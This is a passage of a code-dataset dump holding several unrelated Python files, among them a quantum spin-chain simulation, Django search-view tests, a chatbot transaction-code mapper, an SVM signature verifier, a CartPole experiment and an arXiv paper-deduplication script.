range(1,len(V2_ops)):\n V2=H_operations.add(V2,V2_ops[n],np.array([1,1]))\n\nV3_ops = dict()\nV3_ops[0] = Hamiltonian(pxp,pxp_syms)\nV3_ops[0].site_ops[1] = np.array([[0,1],[1,0]])\nV3_ops[0].model = np.array([[0,1,1,1,0]])\nV3_ops[0].model_coef = np.array([1])\nV3_ops[0].gen(uc_size=3,uc_pos=0)\n\nV3_ops[1] = Hamiltonian(pxp,pxp_syms)\nV3_ops[1].site_ops[1] = np.array([[0,1],[1,0]])\nV3_ops[1].model = np.array([[0,1,1,1,0]])\nV3_ops[1].model_coef = np.array([1])\nV3_ops[1].gen(uc_size=3,uc_pos=2)\n\nV3 = V3_ops[0]\nfor n in range(1,len(V3_ops)):\n 
V3=H_operations.add(V3,V3_ops[n],np.array([1,1]))\n\nH0 = spin_Hamiltonian(pxp,\"x\",pxp_syms)\nH0.gen()\nH = H_operations.add(H0,V1,np.array([1,coef[0]]))\nH = H_operations.add(H,V2,np.array([1,coef[1]]))\nH = H_operations.add(H,V3,np.array([1,coef[2]]))\n# H=H0\nH.sector.find_eig()\n\ntemp = Hp + Hm\ndef com(a,b):\n return np.dot(a,b)-np.dot(b,a)\nHz = 1/2*com(Hp,Hm)\ne,u = np.linalg.eigh(Hz)\nfrom Diagnostics import print_wf\nprint(e[0])\nprint_wf(u[:,0],pxp,1e-2)\nprint(\"\\n\")\nprint_wf(u[:,np.size(u,axis=1)-1],pxp,1e-2)\nprint(e)\n\nz=zm_state(3,1,pxp)\nfsa_basis = z.prod_basis()\ncurrent_state = fsa_basis\nfsa_dim = int(2*pxp.N/3)\nfor n in range(0,fsa_dim):\n next_state = np.dot(Hp,current_state)\n next_state = next_state / np.power(np.vdot(next_state,next_state),0.5)\n fsa_basis = np.vstack((fsa_basis,next_state))\n current_state = next_state\nfsa_basis = np.transpose(fsa_basis)\n\nfrom Calculations import gen_krylov_basis\nkrylov_basis = gen_krylov_basis(H.sector.matrix(),int(2*pxp.N/3),z.prod_basis(),pxp,orth=\"gs\")\n\nH2 = np.dot(H.sector.matrix(),H.sector.matrix())\nH2_fsa = np.dot(np.conj(np.transpose(fsa_basis)),np.dot(H2,fsa_basis))\nH_fsa = np.dot(np.conj(np.transpose(fsa_basis)),np.dot(H.sector.matrix(),fsa_basis))\n# H_krylov = np.dot(np.conj(np.transpose(krylov_basis)),np.dot(H.sector.matrix(),krylov_basis))\n# e,u = np.linalg.eigh(H_fsa)\n# ek,uk = np.linalg.eigh(H_krylov)\n# fsa_overlap = np.log10(np.abs(u[0,:])**2)\n# krylov_overlap = np.log10(np.abs(uk[0,:])**2)\n\n# eig_overlap(z,H).plot()\n# plt.scatter(ek,krylov_overlap,marker=\"x\",s=100,color=\"red\",label=\"Krylov\")\n# plt.scatter(e,fsa_overlap,marker=\"D\",s=100,alpha=0.6,label=\"FSA\")\n# plt.legend()\n# plt.xlabel(r\"$E$\")\n# plt.ylabel(r\"$\\log(\\vert \\psi \\vert E \\rangle \\vert^2)$\")\n# plt.title(r\"$PXP + \\lambda_i V_i$, $Z_3$ Scar approximations, $N=$\"+str(pxp.N))\n# plt.show()\n\n# u_comp = np.dot(fsa_basis,u)\n# u_compk = np.dot(fsa_basis,uk)\n# exact_overlap = np.zeros(np.size(e))\n# for n in range(0,np.size(e,axis=0)):\n # max_overlap = 0\n # for m in range(0,np.size(H.sector.eigvectors(),axis=1)):\n # temp = np.abs(np.vdot(u_comp[:,n],H.sector.eigvectors()[:,m]))**2\n # if temp > max_overlap:\n # max_overlap = temp\n # exact_overlap[n] = max_overlap\n\n# exact_overlapk = np.zeros(np.size(ek))\n# for n in range(0,np.size(ek,axis=0)):\n # max_overlap = 0\n # for m in range(0,np.size(H.sector.eigvectors(),axis=1)):\n # temp = np.abs(np.vdot(u_compk[:,n],H.sector.eigvectors()[:,m]))**2\n # if temp > max_overlap:\n # max_overlap = temp\n # exact_overlapk[n] = max_overlap\n\n# plt.plot(ek,exact_overlapk,marker=\"s\",label=\"Krylov\")\n# plt.plot(e,exact_overlap,marker=\"s\",label=\"FSA\")\n# plt.legend()\n# plt.xlabel(r\"$E$\")\n# plt.ylabel(r\"$\\vert \\langle \\psi_{approx} \\vert \\psi_{exact} \\rangle \\vert^2$\")\n# plt.title(r\"$PXP + \\lambda_i V_i$, $Z_3$ Scar approximations, $N=$\"+str(pxp.N))\n# plt.show()\n \n\n","sub_path":"projects/z3_pxp_pertubations/z3_pert_fsa.py","file_name":"z3_pert_fsa.py","file_ext":"py","file_size_in_byte":9054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"67661811","text":"\"\"\" test for app action functionality \"\"\"\nimport json\nimport pathlib\nfrom unittest.mock import patch\n\nfrom django.contrib.auth.models import AnonymousUser\nfrom django.http import JsonResponse\nfrom django.template.response import TemplateResponse\nfrom django.test import TestCase\nfrom django.test.client import 
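The PXP script above builds its scar-approximation basis by repeatedly applying the raising operator Hp to the Z3 product state, normalising after each application, and stacking the results as columns. The skeleton of that loop with a toy matrix standing in for Hp (the real one comes from the Hamiltonian_Classes machinery):

import numpy as np

def fsa_basis(Hp, seed, dim):
    # Columns are the normalised vectors seed, Hp seed, Hp^2 seed, ...
    basis = [seed / np.linalg.norm(seed)]
    for _ in range(dim):
        nxt = Hp @ basis[-1]
        basis.append(nxt / np.linalg.norm(nxt))
    return np.stack(basis, axis=1)

Hp = np.array([[0., 0., 0.],    # toy 3-level raising operator,
               [1., 0., 0.],    # purely illustrative
               [0., 1., 0.]])
print(fsa_basis(Hp, np.array([1., 0., 0.]), 2))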
RequestFactory\nimport responses\n\nfrom bookwyrm import models, views\nfrom bookwyrm.settings import DOMAIN\n\n\nclass Views(TestCase):\n \"\"\"tag views\"\"\"\n\n def setUp(self):\n \"\"\"we need basic test data and mocks\"\"\"\n self.factory = RequestFactory()\n with patch(\"bookwyrm.suggested_users.rerank_suggestions_task.delay\"), patch(\n \"bookwyrm.activitystreams.populate_stream_task.delay\"\n ):\n self.local_user = models.User.objects.create_user(\n \"mouse@local.com\",\n \"mouse@mouse.com\",\n \"mouseword\",\n local=True,\n localname=\"mouse\",\n remote_id=\"https://example.com/users/mouse\",\n )\n self.work = models.Work.objects.create(title=\"Test Work\")\n self.book = models.Edition.objects.create(\n title=\"Test Book\",\n remote_id=\"https://example.com/book/1\",\n parent_work=self.work,\n )\n models.SiteSettings.objects.create()\n\n def test_search_json_response(self):\n \"\"\"searches local data only and returns book data in json format\"\"\"\n view = views.Search.as_view()\n request = self.factory.get(\"\", {\"q\": \"Test Book\"})\n with patch(\"bookwyrm.views.search.is_api_request\") as is_api:\n is_api.return_value = True\n response = view(request)\n self.assertIsInstance(response, JsonResponse)\n\n data = json.loads(response.content)\n self.assertEqual(len(data), 1)\n self.assertEqual(data[0][\"title\"], \"Test Book\")\n self.assertEqual(data[0][\"key\"], f\"https://{DOMAIN}/book/{self.book.id}\")\n\n def test_search_no_query(self):\n \"\"\"just the search page\"\"\"\n view = views.Search.as_view()\n # we need a connector for this, sorry\n request = self.factory.get(\"\")\n with patch(\"bookwyrm.views.search.is_api_request\") as is_api:\n is_api.return_value = False\n response = view(request)\n self.assertIsInstance(response, TemplateResponse)\n response.render()\n\n @responses.activate\n def test_search_books(self):\n \"\"\"searches remote connectors\"\"\"\n view = views.Search.as_view()\n\n models.Connector.objects.create(\n identifier=\"example.com\",\n connector_file=\"openlibrary\",\n base_url=\"https://example.com\",\n books_url=\"https://example.com/books\",\n covers_url=\"https://example.com/covers\",\n search_url=\"https://example.com/search?q=\",\n )\n datafile = pathlib.Path(__file__).parent.joinpath(\"../data/ol_search.json\")\n search_data = json.loads(datafile.read_bytes())\n responses.add(\n responses.GET, \"https://example.com/search?q=Test%20Book\", json=search_data\n )\n\n request = self.factory.get(\"\", {\"q\": \"Test Book\", \"remote\": True})\n request.user = self.local_user\n with patch(\"bookwyrm.views.search.is_api_request\") as is_api:\n is_api.return_value = False\n response = view(request)\n self.assertIsInstance(response, TemplateResponse)\n response.render()\n connector_results = response.context_data[\"results\"]\n self.assertEqual(len(connector_results), 2)\n self.assertEqual(connector_results[0][\"results\"][0].title, \"Test Book\")\n self.assertEqual(\n connector_results[1][\"results\"][0].title,\n \"This Is How You Lose the Time War\",\n )\n\n # don't search remote\n request = self.factory.get(\"\", {\"q\": \"Test Book\", \"remote\": True})\n anonymous_user = AnonymousUser\n anonymous_user.is_authenticated = False\n request.user = anonymous_user\n with patch(\"bookwyrm.views.search.is_api_request\") as is_api:\n is_api.return_value = False\n response = view(request)\n self.assertIsInstance(response, TemplateResponse)\n response.render()\n connector_results = response.context_data[\"results\"]\n self.assertEqual(len(connector_results), 
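The @responses.activate test above works by registering a canned JSON payload for a URL, so the connector's real HTTP request is intercepted instead of hitting the network. The core of the pattern in isolation; URL and payload are invented:

import requests
import responses

@responses.activate
def fetch_search():
    responses.add(
        responses.GET,
        'https://example.com/search?q=Test%20Book',
        json={'docs': [{'title': 'Test Book'}]},    # canned response body
    )
    return requests.get('https://example.com/search?q=Test%20Book').json()

print(fetch_search())   # {'docs': [{'title': 'Test Book'}]}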
1)\n self.assertEqual(connector_results[0][\"results\"][0].title, \"Test Book\")\n\n def test_search_users(self):\n \"\"\"searches remote connectors\"\"\"\n view = views.Search.as_view()\n request = self.factory.get(\"\", {\"q\": \"mouse\", \"type\": \"user\"})\n request.user = self.local_user\n response = view(request)\n\n self.assertIsInstance(response, TemplateResponse)\n response.render()\n self.assertEqual(response.context_data[\"results\"][0], self.local_user)\n\n def test_search_users_logged_out(self):\n \"\"\"searches remote connectors\"\"\"\n view = views.Search.as_view()\n request = self.factory.get(\"\", {\"q\": \"mouse\", \"type\": \"user\"})\n\n anonymous_user = AnonymousUser\n anonymous_user.is_authenticated = False\n request.user = anonymous_user\n\n response = view(request)\n\n response.render()\n self.assertFalse(\"results\" in response.context_data)\n\n def test_search_lists(self):\n \"\"\"searches remote connectors\"\"\"\n with patch(\"bookwyrm.models.activitypub_mixin.broadcast_task.delay\"):\n booklist = models.List.objects.create(\n user=self.local_user, name=\"test list\"\n )\n view = views.Search.as_view()\n request = self.factory.get(\"\", {\"q\": \"test\", \"type\": \"list\"})\n request.user = self.local_user\n response = view(request)\n\n self.assertIsInstance(response, TemplateResponse)\n response.render()\n self.assertEqual(response.context_data[\"results\"][0], booklist)\n","sub_path":"bookwyrm/tests/views/test_search.py","file_name":"test_search.py","file_ext":"py","file_size_in_byte":5925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"369018243","text":"\"\"\"\nThe init script for create Page table in Postgres Database\n\"\"\"\n\nfrom sqlalchemy import Column, MetaData, String, Table\nfrom sqlalchemy.dialects.postgresql import TSVECTOR\n\nfrom metadata.session import get_engine\n\n\nmdata = MetaData()\n\npages_table = Table('pages', mdata,\n Column('url', String, primary_key=True),\n Column('content', TSVECTOR))\n\n\nif __name__ == '__main__':\n engine = get_engine()\n mdata.create_all(engine)\n","sub_path":"v2.0/metadata/init.py","file_name":"init.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"334356767","text":"# -----------------------------------------------------------\n# demonstrates how to map mandatory parameters for api call\n#\n# (C) 2019 Discover Bank, USA\n# Released under GNU Public License (GPL)\n# email rahulsawriya@discover.com\n# -----------------------------------------------------------\nfrom datetime import datetime\nfrom scripts.operations import Jsonops\n#from operations import Jsonops\nclass Case:\n def slot_ops(self, acct_cat, mon_type, post_amt, post_date, brand_new, waiver, late_time, on_time, category, accountTypeTransfer, balanceTransferType, cycle_type, payment_type, cred):\n tran_code = None\n tran_code_extn = None\n if post_date is None: post_date = datetime.today().strftime('%Y%m%d')\n if acct_cat in(\"Discover IT\",\"discover IT\", \"Discover it\",\"discoverIt\", \"discover it\",\"IT\",\"it\",\"It\"):\n termlevel, option_code, external_status, act_lvl_code, card_type = \"28\", \"31\", \"R\", \"3\", \"000001\"\n print(acct_cat)\n if acct_cat in(\"Non IT\",\"non IT\",\"Non IT\",\"Non it\",\"Non It\",\"non it\",\"Consumer\",\"consumer\",\"Discover\",\"discover\"):\n termlevel, option_code, external_status, act_lvl_code, card_type = \"28\", \"30\", \"R\", \"3\", 
\"000001\"\n print(acct_cat)\n if acct_cat in(\"SBC\",\"Sbc\",\"sbc\"):\n termlevel, option_code, external_status, act_lvl_code, card_type = \"26\", \"26\", \"R\", \"3\", \"000012\"\n print(acct_cat)\n if acct_cat in(\"Corp\",\"CORP\",\"corp\"):\n termlevel, option_code, external_status, act_lvl_code, card_type = \"01\", \"06\", \"R\", \"3\", \"000002\"\n print(acct_cat)\n if acct_cat in(\"Non sbc\", \"Non Sbc\", \"NON SBC\", \"non sbc\", \"Non SBC\"):\n termlevel, option_code, external_status, act_lvl_code, card_type = \"28\", \"30\", \"R\", \"3\", \"000001\"\n print(acct_cat)\n if acct_cat is None:\n termlevel, option_code, external_status, act_lvl_code, card_type = \"28\", \"30\", \"R\", \"3\", \"000001\"\n print(acct_cat)\n if mon_type in(\"Payment\",\"payment\") or payment_type in(\"Payment\",\"payment\"):\n tran_code, tran_code_extn = \"1710\", \"001001\"\n print(mon_type)\n print(acct_cat)\n #if payment_type in(\"Payment\",\"payment\") or payment_type in(\"return\",\"Return\"):\n if payment_type in(\"return\",\"Return\"):\n tran_code, tran_code_extn = \"1712\", \"004753\"\n if mon_type in(\"SALE\",\"Sale\",\"sale\",\"sales\",\"Sales\", \"purchase\",\"Purchase\"):\n tran_code, tran_code_extn = \"1720\", \"001001\"\n print(mon_type)\n if mon_type in(\"cash\",\"Cash\",\"CASH\",\"cash advance\",\"Cash Advance\"):\n tran_code, tran_code_extn = \"1700\", \"003001\"\n print(mon_type)\n if mon_type in(\"return\",\"Return\"):\n tran_code, tran_code_extn = \"1730\", \"001001\"\n #transaction_date = tracker.get_slot('transaction_date')\n #post_proc_date = tracker.get_slot('post_proc_date')\n print(mon_type)\n if cycle_type == \"backdated sales\" or cycle_type == \"cross cycle sales\":\n tran_code, tran_code_extn = \"1720\", \"001001\"\n return [termlevel, option_code, external_status, act_lvl_code, card_type, tran_code, tran_code_extn, post_amt, brand_new, waiver, late_time, on_time, category, accountTypeTransfer, balanceTransferType, cycle_type, payment_type, cred]\n \n def mon_cases(self, acct_cat, mon_type, post_amt, post_date, brand_new, waiver, late_time, on_time, category, accountTypeTransfer, balanceTransferType, cycle_type, payment_type, cred):\n val = self.slot_ops(acct_cat, mon_type, post_amt, post_date, brand_new, waiver, late_time, on_time, category, accountTypeTransfer, balanceTransferType, cycle_type, payment_type, cred)\n x = Jsonops()\n data = x.json_process(val)\n return data\n \n \n#obj = Case()\n#obj.slot_ops(\"non IT\", \"sales\", 23, 20192013)\n#obj.mon_cases(\"non IT\", \"sales\", 23, 20192013)\n","sub_path":"chatbot/rasa/scripts/cases.py","file_name":"cases.py","file_ext":"py","file_size_in_byte":3736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"513332970","text":"#! 
/usr/bin/python\n\n#Copy from Yijie's tool\nimport numpy as np\nimport json\nfrom matplotlib import (pyplot as plt, patches as patches)\nfrom PIL import Image # pip install pillow\nfrom skimage.filters import threshold_local # pip install scikit-image\nimport os\nfrom os import path\nimport pandas as pd\nfrom PIL import Image\nfrom resizeimage import resizeimage\nfrom sklearn.svm import SVC\nfrom sklearn import datasets\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import RandomizedSearchCV\nfrom scipy.stats import reciprocal, uniform\nfrom sklearn.metrics import accuracy_score, confusion_matrix\nfrom sklearn.model_selection import train_test_split\n# area of bounding box\ndef rotate_bbox_area(img, deg):\n box = img.rotate(deg, expand=True).getbbox()\n return (box[3] - box[1]) * (box[2] - box[0])\n \ndef rotate_crop(img, deg, padding=0):\n img_rotate = img.rotate(deg, expand=True, resample=Image.BILINEAR)\n box = img_rotate.getbbox()\n if padding > 0:\n box = np.asarray(box) + [-padding, -padding, +padding, +padding]\n return img_rotate.crop(box)\n\n\ntol_deg = 10\n# smallest bounding box wihin -10~10 degrees rotation\ndef opt_rotate(img, padding=0):\n opt_deg = np.argmin(\n [rotate_bbox_area(img, i) for i in range(-tol_deg,tol_deg+1)]\n ) - tol_deg\n return rotate_crop(img, opt_deg, padding)\n\n# downsampling\ndef img_reduce(img, side=28, mode=Image.ANTIALIAS):\n h = side + 1 \n w = int(side * img.width / img.height) + 1\n img_reduced = img.copy()\n # the reduced image size is (w-1, h-1)\n img_reduced.thumbnail((w, h), mode)\n return img_reduced\n\n\n# convert PIL.Image object to numpy.Array, for training\ndef img2arr(img):\n return np.asarray(img.getdata(), dtype=np.uint8).reshape(img.height, img.width, -1)\n\n\n# convert binarized image to gray-scale image with alpha channel\ndef bin2LA(bin_img):\n mask = np.uint8(255 * (False == bin_img))\n box = Image.fromarray(mask).getbbox()\n LA_img = np.concatenate((np.uint8(255 * bin_img)[:,:,None], mask[:,:,None]), axis=2)\n LA_img = Image.fromarray(LA_img).convert('LA')\n return LA_img.crop(box)\n\n\n# process single signature with transparent background\ndef process_one(img):\n return img_reduce(opt_rotate(img, padding=1).convert('LA'))\n\n\n# train the data set to find the best parameters used in SVM\ndef train():\n file = pd.read_csv(\"png.csv\")\n X=[] #The list of pictures\n y=[] #The list of the label\n for index, row in file.iterrows():\n file_path = path.relpath(row['path'])\n img = Image.open(file_path).convert('LA')\n img_reduced = process_one(img)\n img_reduced = img_reduced.resize((28,28))\n Twod_array = np.asarray(img_reduced)\n Oned_array = Twod_array.ravel()\n Oned_array = Oned_array.astype(np.float64)\n X.append(list(Oned_array))\n y.append(row['type'])\n\n X = np.asarray(X)\n\n genuine_or_forged = {\"genuine\":True, \"forged\":False}\n y = list(map(lambda x :genuine_or_forged[x] ,y))\n #Training set and Testing test shuffling\n X_train, X_test, y_train, y_test = train_test_split(\n X, y, random_state=44)\n #Randomized Search\n svm_clf = SVC(kernel=\"linear\", C=float(\"inf\"))\n param_distributions = {\"gamma\": reciprocal(0.001, 0.1), \"C\": uniform(1, 10)}\n rnd_search_cv = RandomizedSearchCV(svm_clf, param_distributions, n_iter=10, verbose=2)\n rnd_search_cv.fit(X,y)\n svm_clf = rnd_search_cv.best_estimator_\n svm_clf.fit(X_train, y_train)\n predicted = svm_clf.predict(X_test) \n print(\"Test set score: {:.3f}\".format(accuracy_score(y_test, 
predicted)))\n print(\"Below is the confusion matrix\")\n print(confusion_matrix(y_test,predicted))\n return svm_clf\n\n# Predict the user input\ndef test(path_str):\n X_predict = []\n file_path = path.relpath(path_str)\n img = Image.open(file_path).convert('LA')\n img_reduced = process_one(img)\n img_reduced = img_reduced.resize((28,28))\n Twod_array = np.asarray(img_reduced)\n Oned_array = Twod_array.ravel()\n Oned_array = Oned_array.astype(np.float64)\n X_predict.append(list(Oned_array))\n result = train().predict(X_predict)\n return result[0]\n\n\nif __name__ == '__main__': \n print(test(\"True.png\"))\n\n\n\n\n\n","sub_path":"SignatureVerification/Verification.py","file_name":"Verification.py","file_ext":"py","file_size_in_byte":4278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"125360747","text":"'''\r\nPrint out IMDB Top 250 movies\r\n'''\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nr = requests.get(\"http://www.imdb.com/chart/top\")\r\nr_html = r.text\r\nsoup = BeautifulSoup(r_html)\r\nfor titleColumn in soup.find_all(\"td\", class_ =\"titleColumn\"):\r\n print(titleColumn.a.text)\r\n","sub_path":"practicepython.org/IMDB250.py","file_name":"IMDB250.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"568520584","text":"import gym\nimport random\nimport numpy as np\nimport tensorflow as tf\n\n'''\nThe code solves question 1 and 2. The 2000 iterations for part 3 is created in this code and saved in this code.\n'''\nenv = gym.make('CartPole-v0')\nenv.reset()\nmax_episode = 300\ndf = 0.99 # Discount factor\n\n\n\ndef randompolicy(trajectories):\n results = np.zeros([trajectories, 2])\n data = np.empty([0,10])\n for episode in range(trajectories):\n observation = env.reset() # initial state at the start of the game\n\n for t in range(max_episode):\n # env.render()\n #action = (np.random.uniform(0, 1) > 0.5)*1 # Action is random 0 or 1 (left or right)\n action = (np.random.rand() > 0.5) * 1\n\n # Store current state and action. 
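Note that test() in the signature-verification record above calls train() inside its prediction line, so the whole pipeline -- CSV load, RandomizedSearchCV, SVC fit -- reruns on every single prediction. Fitting once and reusing the model is the usual fix; a runnable sketch of the caching shape, with a placeholder standing in for the expensive fit:

from functools import lru_cache

@lru_cache(maxsize=1)
def get_classifier():
    # Stands in for train(): the real function loads png.csv, runs the
    # randomised search and fits an SVC. With the cache that happens once.
    print('training...')
    return 'fitted-model-placeholder'

get_classifier()   # prints 'training...' and "fits"
get_classifier()   # cached: no second fit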
Make placeholder for reward and future state\n data = np.r_[data, [np.append(observation, [action, 0, 0, 0, 0, 0])]]\n\n observation, reward, done, info = env.step(action) # take action\n\n if done:\n reward = -1\n else:\n reward = 0\n # Store the resultant state from action and reward from action\n data[-1, 5:10] = np.append(observation, reward)\n if done:\n break\n results[episode,0] = t\n results[episode,1] = np.power(df, t) * reward\n\n return results, data\n\n\nprint('-----------------------------------------------')\nprint('Question 1: Results')\nresults, data = randompolicy(3)\nprint(results)\nprint(data.shape)\n\n\nprint('-----------------------------------------------')\nprint('Question 2: Mean and std')\nresults, _ = randompolicy(100)\nmean = np.mean(results,0)\nstd = np.std(results,0)\nprint(mean)\nprint(std)\n\nprint('-----------------------------------------------')\nprint('Question 3: ')\nfilepath = '/home/raza/Documents/Advanced/CW3/Code/data'\nresults, data = randompolicy(2000)\n\nprint(data.shape)\nnp.save(filepath, data)\nprint('Data saved in', filepath)\n#print(data)\n\n\n#print(results)\n\n","sub_path":"Code/problemA.py","file_name":"problemA.py","file_ext":"py","file_size_in_byte":1981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"55530860","text":"import sys\nimport os\nimport time\nfrom time import mktime\nfrom datetime import datetime\nimport collections\nimport pickle\nimport random\nimport argparse\nfrom shutil import copyfile\nfrom collections import defaultdict\nimport glob\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom utils import Config, safe_pickle_dump\nimport stopwords\n\n# lets load the existing database to memory\ntry:\n print(Config.db_path)\n db = pickle.load(open(Config.db_path, 'rb'))\nexcept Exception as e:\n print('error loading existing database:')\n print(e)\n print('starting from an empty database')\n db = {}\n\ndef get_full_paper_id(full_paper_id):\n return full_paper_id.split('/')[-1]\n\ndef get_paper_id_without_version(full_paper_id):\n return full_paper_id.split('/')[-1].split('v')[0]\n\nassert get_full_paper_id('http://arxiv.org/abs/1804.03131v1') == '1804.03131v1'\nassert get_paper_id_without_version('http://arxiv.org/abs/1804.03131v1') == '1804.03131'\n\nfull_id_to_title_dict = {get_full_paper_id(doc['id']): doc['title'] for k, doc in db.items()}\nid_before_version_to_title_dict = {get_paper_id_without_version(doc['id']): doc['title'] for k, doc in db.items()}\nunique_ids_before_version = set([get_paper_id_without_version(doc['id']) for k, doc in db.items()])\n\nwith open('full_paper_id_to_title_dict.pkl', 'wb') as f:\n pickle.dump(full_id_to_title_dict, f)\n\n\ndef get_latest_paper_identifier(list_of_paper_identifiers):\n version_nums = [paper_id.split('/')[-1].split('.pdf')[0].split('v')[-1]\n for paper_id in list_of_paper_identifiers]\n index_of_highest_version_num = version_nums.index(max(version_nums))\n\n return list_of_paper_identifiers[index_of_highest_version_num]#.split('/')[-1]\n\n# get latest version of all files\nall_files = glob.glob('data/txt/*')\n\nsame_paper_dict = defaultdict(list)\n# holds lists of different versions of said paper\n# example key: value = '1712.01217': '1712.01217v1.pdf.txt'\ncount_found_with_title = 0\ncount_found_with_id_before_version = 0\ncount_of_papers_with_more_than_1_version = 0\nfor f in all_files:\n full_id = f.split('/')[-1].split('.pdf')[0]\n id_without_version = full_id.split('v')[0]\n 
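get_latest_paper_identifier in the record above takes max() over version numbers kept as strings, which compares lexicographically: '9' sorts above '10', so a v10 paper would lose to its v9 predecessor. Casting to int before comparing avoids that; a self-contained check:

def latest(paper_ids):
    # Version suffix after the final 'v', compared numerically.
    versions = [int(p.split('/')[-1].split('.pdf')[0].split('v')[-1])
                for p in paper_ids]
    return paper_ids[versions.index(max(versions))]

ids = ['1712.01217v9', '1712.01217v10']
print(max(s.split('v')[-1] for s in ids))   # '9' -- the string comparison misorders
print(latest(ids))                          # '1712.01217v10'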
same_paper_dict[id_without_version].append(full_id)\n if len(same_paper_dict[id_without_version]) > 1:\n count_of_papers_with_more_than_1_version += 1\n if id_before_version_to_title_dict.get(id_without_version):\n count_found_with_title += 1\n if full_id_to_title_dict.get(full_id):\n count_found_with_id_before_version += 1\n\n\nfor paper_id in same_paper_dict.keys():\n print(same_paper_dict[paper_id])\n latest_paper_fp = get_latest_paper_identifier(same_paper_dict[paper_id])\n\n src_path = 'data/txt/{}.pdf.txt'.format(latest_paper_fp)\n dst_path = 'data/final_version_paper_txt/{}.pdf.txt'.format(latest_paper_fp.split('/')[-1])\n print('Copying src_path: {} to dst_path: {}'.format(src_path, dst_path))\n copyfile(src_path, dst_path)\n\nprint('Number of text files: {}'.format(len(all_files)))\nprint('Number of paper entries in db: {}'.format(len(db.keys())))\nprint('Num unique identifiers before version: {}'.format(len(unique_ids_before_version)))\nprint('Num papers with final version: {}'.format(len(same_paper_dict)))\nprint('full_id_to_title_dict len: {}'.format(len(full_id_to_title_dict)))\nprint('count_found_with_id_before_version len: {}'.format(count_found_with_id_before_version))\nprint('count_found_with_title len: {}'.format(count_found_with_title))\nprint('count_of_papers_with_more_than_1_version len: {}'.format(count_of_papers_with_more_than_1_version))\nprint('{} - {} = {}'.format(count_found_with_title, count_found_with_id_before_version, count_found_with_title - count_found_with_id_before_version))\nprint('Num found with title: {}/{}'.format(count_found_with_title, len(all_files)))\n","sub_path":"create_final_version_txt_dataset.py","file_name":"create_final_version_txt_dataset.py","file_ext":"py","file_size_in_byte":3813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"164879607","text":"import collections\nimport re\nimport pickle\n\nchar_to_emoji = {\n 'a': '🇦', 'b': '🇧', 'c': '🇨', 'd': '🇩', 'e': '🇪', 'f': '🇫', 'g': '🇬',\n 'h': '🇭', 'i': '🇮', 'j': '🇯', 'k': '🇰', 'l': '🇱', 'm': '🇲', 'n': '🇳',\n 'o': '🇴', 'p': '🇵', 'q': '🇶', 'r': '🇷', 's': '🇸', 't': '🇹', 'u': '🇺',\n 'v': '🇻', 'w': '🇼', 'x': '🇽', 'y': '🇾', 'z': '🇿',\n}\n\nclass Rule:\n prop = ''\n expression = ''\n value = ''\n color = ''\n\n def __init__(self, prop: str, expression: str, value: str, color: str):\n self.prop = prop\n self.expression = expression\n self.value = value\n self.color = color\n\n\n def match(self, data: dict) -> bool:\n return re.match(self.expression, data[self.prop]) != None\n\n\nclass IconResolver:\n _rules = []\n _cache = {}\n\n\n def __init__(self, rules):\n self._rules = [self._parse_rule(rule) for rule in rules]\n\n def get_color(self, app):\n\n for rule in self._rules:\n if rule.match(app):\n return rule.color\n return '#ffffff'\n\n def resolve(self, app):\n id = pickle.dumps(app)\n if id in self._cache:\n return self._cache[id]\n\n for rule in self._rules:\n if rule.match(app):\n out = '%{F' + rule.color + '}' + rule.value + '%{F-}'\n break\n else:\n out = app['class'][0].lower()\n if out in char_to_emoji:\n out = char_to_emoji[out]\n\n self._cache[id] = out\n\n return out\n\n\n def _parse_rule(self, rule) -> Rule:\n parts = rule[0].split('=', 1)\n\n prop = 'class'\n match = ''\n\n if len(parts) > 1:\n prop = parts[0]\n match = parts[1]\n else:\n match = parts[0]\n\n # exp = re.escape(match).replace('\\\\*', '.+')\n exp = match\n\n return Rule(prop, exp, rule[1], 
rule[2])\n","sub_path":"icon_resolver.py","file_name":"icon_resolver.py","file_ext":"py","file_size_in_byte":1951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"594592567","text":"\"\"\"ADD MODULE DOCSTRING HERE\"\"\"\n\n# Standard Library\nimport datetime as dt\nimport logging\n\n# Third-party\nimport numpy as np\nimport numpy.ma as ma\nimport pandas as pd\nimport matplotlib.colors as mcolors\nimport matplotlib.dates as mdates\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.basemap import Basemap\n\n# Local modules/packages\n\n#------------------------------------------------------------------------------#\n\n__all__ = ['map_meltdays',\n 'map_tb',\n 'plot_meltindex',\n 'plot_platforms']\n\n#------------------------------------------------------------------------------#\n\nlogger = logging.getLogger(__name__)\n\n#==============================================================================#\n# XY PLOTS\n#==============================================================================#\n\ndef plot_platforms(flist, figname=None):\n \"\"\"ADD FUNCTION DOCSTRING HERE\"\"\"\n\n platforms = sorted(list(set(flist.platform)))\n sdate, edate = [], []\n for platform in platforms:\n dates = flist.date[flist.platform == platform].values\n sdate.append(pd.to_datetime(dates[0]))\n edate.append(pd.to_datetime(dates[-1]))\n # Convert dates to matplotlib's internal format\n sdate, edate = [mdates.date2num(item) for item in (sdate, edate)]\n ypos = np.arange(len(platforms)) + 1\n colors = ['dodgerblue', 'salmon', 'orange', 'orangered', 'chocolate']\n fig, ax = plt.subplots()\n # Plot the data\n ax.barh(ypos, edate - sdate, left=sdate, height=0.4, align='center', color=colors)\n ax.set_ylim([0.5,5.5])\n ax.set_yticks(ypos)\n ax.set_yticklabels(platforms, size='large')\n # Tell matplotlib that these are 